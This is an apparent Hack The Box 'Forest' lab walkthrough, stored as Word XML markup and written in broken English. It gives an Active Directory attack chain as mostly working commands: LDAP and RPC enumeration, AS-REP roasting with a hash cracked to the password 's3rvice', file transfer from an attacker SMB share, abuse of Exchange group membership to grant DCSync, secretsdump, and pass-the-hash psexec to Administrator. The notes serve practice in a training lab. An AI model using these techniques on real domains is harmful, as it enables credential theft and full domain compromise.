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1AF96259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850B42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Forest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461E3D54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  <w:r w:rsidR="00351BE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This lab is the perfect as to understand the complex ways to finds the overcome the all parameter without any requirements. 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271FEEC8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850B42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sC -sV 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4A001B2A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Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4DC2E8" w14:textId="03B9BCF0" w:rsidR="004A48E8" w:rsidRDefault="004A48E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because port 445 port op</w:t>
      </w:r>
      <w:r w:rsidR="00837466">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78971789" w14:textId="31F68B60" w:rsidR="00843DCE" w:rsidRDefault="00191B2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smbclient -L t_ip</w:t>
      </w:r>
      <w:r w:rsidR="00A40524">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = for anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED8A149" w14:textId="44004DA7" w:rsidR="00837466" w:rsidRDefault="0083746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port 53 open = DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E30DA8E" w14:textId="5957946F" w:rsidR="00191B20" w:rsidRDefault="0083746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nslookup = server t_ip = 127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidR="009707B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or 2 = could not leak host name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716D8F00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port 389 = ldap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1313F83A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ldapsearch -h t_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00267B0D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ldapsearch -h t_ip -x = for simple authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4B5B1E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ldapsearch -h t_ip -x -s base namingcontexts = for domain name DC=xx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F36CFB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ldapsearch -h t_ip -x -b “DC=htb,DC=local” &gt; ldap.out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA8D4AA" w14:textId="77777777" w:rsidR="00351BE2" w:rsidRPr="00A72661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to search cat ldap.out | grep -i anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F364C9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 w:rsidRPr="00A72661">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ldapsearch -h t_i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p -x -b “DC=htb,D=local” ‘(objectClass=Person)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046E437F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= this dump the data of class that has people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049D8C22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but we don’t obtain any password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B15B17F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 w:rsidRPr="00A72661">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ldapsearch -h t_i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">p -x -b “DC=htb,D=local” ‘(objectClass=Person)’ sAMAccountName | grep sAmaccountName = we obtain the usernames save to the user.ldap take last 5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A471100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hashcat - -force - -stdout rockyou.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule | sort -u | awk ‘length($0) &gt; 7’ &gt; ppp.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1364323A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ppp.txt | wc -l = near to the 40k </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E78D0D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nxc smb t_ip - -pass-pol -u ‘’ -p ‘’ = notice account threshold 0 and anonymous </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1AE51F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can brute force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D48EFB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rpcclient -U ‘’ t_ip = here we see 1 extra user = svc-alfresco = add into list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267E2048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queryusergroups rid_ofsvc = obtain another rid of group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA92F9D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querygroup rid = try both 1 is domain user and 2 is service account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2894827D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queryuser rid_ofsvc = to just see what’s about user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645EB0D4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nxc t_ip -u user.ldap  -p ppp.txt = run it in background </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB2906E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impacket-GetNPUsers -dc-ip t_ip -request ‘htb.local/’ -format hashcat = we obtain the hash directory of svc-alfresco account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205B9684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save it to file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AA1586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hashcat - -example-hashes | grep -I krb = notice what number we have its 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C08B223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hashcat - -example-hashes | less = find 23 and notice its 18200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A6B751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hashcat -m 18200 hash rockyou.txt -r rules/Insiderpro-passwordspro.rule = s3rvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD366A7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nxc smb t_ip -u svc-alfresco -p s3rvice </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1618C5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do it for winrn </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C0FA09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user.txt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5DB40F4" w14:textId="79FF7C7C" w:rsidR="00351BE2" w:rsidRPr="00351BE2" w:rsidRDefault="00843DCE" w:rsidP="00351BE2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37578E15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may do further steps via python3 http.server and sent the winPEAS.exe with start it in shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F2935F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locate winPEAS.exe = take obj/release </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590C71E3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cp to bhavya</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D79EB27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impacket-smbserver Manvar $(pwd) -smb2support -user bhavya -password Pqpqpqp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593F2144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shell at c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EC0F55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$pass = convertto-securesting ‘Pqpqpqp’ -AsPlainText -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1523B8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$pass = it show something</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42081CA4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$cred = New.Object System.Management.Automation.PSCredential(‘bhavya’,$pass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3F8E67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$cred = it show both</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D46E28E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New-PSDrive -Name bhavya -PSProvider FileSyatem -Credential $cred -Root </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00777757">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>\\10.10.14.56\Pqpqpqp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="636E32F5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its perfectly done and then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A5C4E3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bhavya = dir = we see winPEAS.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137EF0D0" w14:textId="77777777" w:rsidR="00351BE2" w:rsidRDefault="00351BE2" w:rsidP="00351BE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.\winPEAS.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1019C600" w14:textId="77777777" w:rsidR="00351BE2" w:rsidRPr="00351BE2" w:rsidRDefault="00351BE2" w:rsidP="00843DCE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59344F06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neorj start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C88C0B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,.bloodhound - -no-sendbox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B16D4C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take the json files of bloodhound = from our txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBAB448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put them into the bloodhound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A3066C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svc-alfresco = shortest path from own principals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113A3607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net user bhavya PleaseSub /add/domain = it work as account operator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01376764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net group “Exchange Windows Permissions”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45860753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net group “Exchange Windows Permissions” /add bhavya</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D3C422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net group “Exchange Windows Permissions” =it showcase name bhavya as member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74182E81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notice generical all = what we follow till here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBD091E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notice exchange to htb.local = wait for some type to do with powerview.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1513A04A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clone powersploit =into it = cd recon = cp to bhavya where python server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF8E8F0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main shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640CFF8D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$pass = convertto-securesting ‘PleaseSub’ -AsPlainText -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B49F2F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$cred = New.Object System.Management.Automation.PSCredential(‘HTB\bhavya’,$pass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694BBB8B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Add-DomainObjectAcl -Credential $cred -TargetIdentity htb.local -Rights DCSync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1966ABCD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locate secrestdump.py = with python3-imapcket location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D984F5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./secrestdump.py htb.local/bhavya:PleaseSub@t_ip = not now after run the future command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCE684C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google we search add-domainobjectacl rights dcsync = in burmat.gitbook we notice the perfect syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3283F56A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Add-DomainObjectAcl -Credential $cred -TargetIdentity “DC=htb,DC=local” -PrincipalIdentity bhavya -Rights DCSync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6ABA21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in scretdump we obtain the hash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18733691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nxc smb t_ip -u administrator -H paste = it showcase Pwn3d!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17012375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impacket-psexec administrator@t-ip = its only work for password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B9FD9F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here we have hash so </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7743867D" w14:textId="77777777" w:rsidR="005E6057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impacket-psexec -hashes paste:paste administrator@t-ip </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C2DC30" w14:textId="748B5F6B" w:rsidR="00843DCE" w:rsidRDefault="005E6057" w:rsidP="005E60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root.txt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1460C005" w:rsidR="00A311DF" w:rsidRPr="005E6057" w:rsidRDefault="005E605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In Desktop we obtain the root.txt </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A311DF" w:rsidRPr="005E6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12614"/>
    <w:rsid w:val="000231DC"/>
    <w:rsid w:val="000275D2"/>
    <w:rsid w:val="00031BDE"/>
    <w:rsid w:val="000675D7"/>
    <w:rsid w:val="00080C73"/>
    <w:rsid w:val="000946EA"/>
    <w:rsid w:val="000A14A8"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="00112FA4"/>
    <w:rsid w:val="00175119"/>
    <w:rsid w:val="00191B20"/>
    <w:rsid w:val="001B1B45"/>
    <w:rsid w:val="00206785"/>
    <w:rsid w:val="0027667F"/>
    <w:rsid w:val="003148E6"/>
    <w:rsid w:val="00351BE2"/>
    <w:rsid w:val="003804B3"/>
    <w:rsid w:val="003B1963"/>
    <w:rsid w:val="003E58F8"/>
    <w:rsid w:val="00407AD9"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00435D0E"/>
    <w:rsid w:val="00487BE5"/>
    <w:rsid w:val="004A48E8"/>
    <w:rsid w:val="004B21FC"/>
    <w:rsid w:val="004F7B4F"/>
    <w:rsid w:val="005026D6"/>
    <w:rsid w:val="005432D5"/>
    <w:rsid w:val="005603A7"/>
    <w:rsid w:val="005E6057"/>
    <w:rsid w:val="005F5CDA"/>
    <w:rsid w:val="00603D20"/>
    <w:rsid w:val="0064539A"/>
    <w:rsid w:val="0064777D"/>
    <w:rsid w:val="006D3FA7"/>
    <w:rsid w:val="006E2250"/>
    <w:rsid w:val="006E5905"/>
    <w:rsid w:val="00733D1A"/>
    <w:rsid w:val="00752B4B"/>
    <w:rsid w:val="007D0558"/>
    <w:rsid w:val="00837466"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00850B42"/>
    <w:rsid w:val="008853B4"/>
    <w:rsid w:val="008863FE"/>
    <w:rsid w:val="00893A08"/>
    <w:rsid w:val="008957C7"/>
    <w:rsid w:val="008A3A7D"/>
    <w:rsid w:val="008A6F97"/>
    <w:rsid w:val="008E534B"/>
    <w:rsid w:val="00920CFF"/>
    <w:rsid w:val="00934687"/>
    <w:rsid w:val="009707B7"/>
    <w:rsid w:val="00991DAD"/>
    <w:rsid w:val="00995EA2"/>
    <w:rsid w:val="00A15807"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A40524"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A6167E"/>
    <w:rsid w:val="00A72661"/>
    <w:rsid w:val="00B30FFC"/>
    <w:rsid w:val="00B73E91"/>
    <w:rsid w:val="00BD0FA3"/>
    <w:rsid w:val="00C70D6F"/>
    <w:rsid w:val="00C822C3"/>
    <w:rsid w:val="00C94FF4"/>
    <w:rsid w:val="00CE19BE"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00DD503E"/>
    <w:rsid w:val="00DE78A7"/>
    <w:rsid w:val="00E908F9"/>
    <w:rsid w:val="00EB34A0"/>
    <w:rsid w:val="00F27FD7"/>
    <w:rsid w:val="00F433C1"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00FA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D6F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7B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B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\\10.10.14.56\Pqpqpq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69</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-25T16:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>